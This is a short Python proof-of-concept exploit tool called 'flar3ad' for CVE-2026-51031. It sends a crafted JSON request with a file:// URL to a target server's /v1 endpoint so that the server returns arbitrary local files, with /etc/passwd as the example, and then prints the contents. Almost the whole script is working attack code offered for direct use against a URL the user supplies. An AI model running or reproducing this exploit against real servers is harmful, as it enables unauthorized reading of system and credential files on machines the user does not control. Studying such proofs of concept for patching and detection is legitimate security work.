#!/usr/bin/env python3

import requests
import argparse
import json
from rich.status import Status
from rich.console import Console

console = Console()

def command():
    parser = argparse.ArgumentParser(
        prog='flar3ad',
        description='POC for CVE-2026-51031 to read local files in a remote server.',
        epilog='Thanks for supporting me!',
        formatter_class=argparse.RawTextHelpFormatter,
        )

    parser.add_argument('url', help="URL to the remote server (Example: \"http://example.com/\")")
    parser.add_argument('file', help="File to read from the remote server (Example: \"/etc/passwd\")")
    args = parser.parse_args()
    if not args.url or not args.file:
        parser.error(f"No input provided. You must specify the URL of the domain that you want to obtain information about.")
    return args

def displayHeader():
    console.print("""[blue]  _____.__              ________             .___
_/ ____\\  | _____ ______\\_____  \\_____     __| _/
\\   __\\|  | \\__  \\\\_  __ \\_(__  <\\__  \\   / __ | 
 |  |  |  |__/ __ \\|  | \\/       \\/ __ \\_/ /_/ | 
 |__|  |____(____  \\__| /______  (____  /\\____ | 
                 \\/            \\/     \\/      \\/ [/blue]\n""")

def sendPayload(args):
    try:
        payload = {
            "cmd": "request.get",
            "url": f"file://{args.file}",
            "maxTimeout": 30000
        }
        header = {
            "Content-Type": "application/json"
        }
        if args.url[-1:] != "/":
            args.url += "/"
        with Status('Sending the payload to the target server...', spinner='aesthetic', console=console):
            r = requests.post(f"{args.url}v1", headers=header, json=payload)
            console.print(f"[[green]+[/green]] Response gathered from remote server:\n")
            print(r.text + "\n")
    except Exception as e:
        console.print(f"[[red]-[/red]] Exception reached: {e}")

if __name__=='__main__':
    try:
        args = command()
        if args:
            displayHeader()
            sendPayload(args)
    except KeyboardInterrupt:
        console.print(f'[[blue]·[/blue]]Program stopped successfully\n')
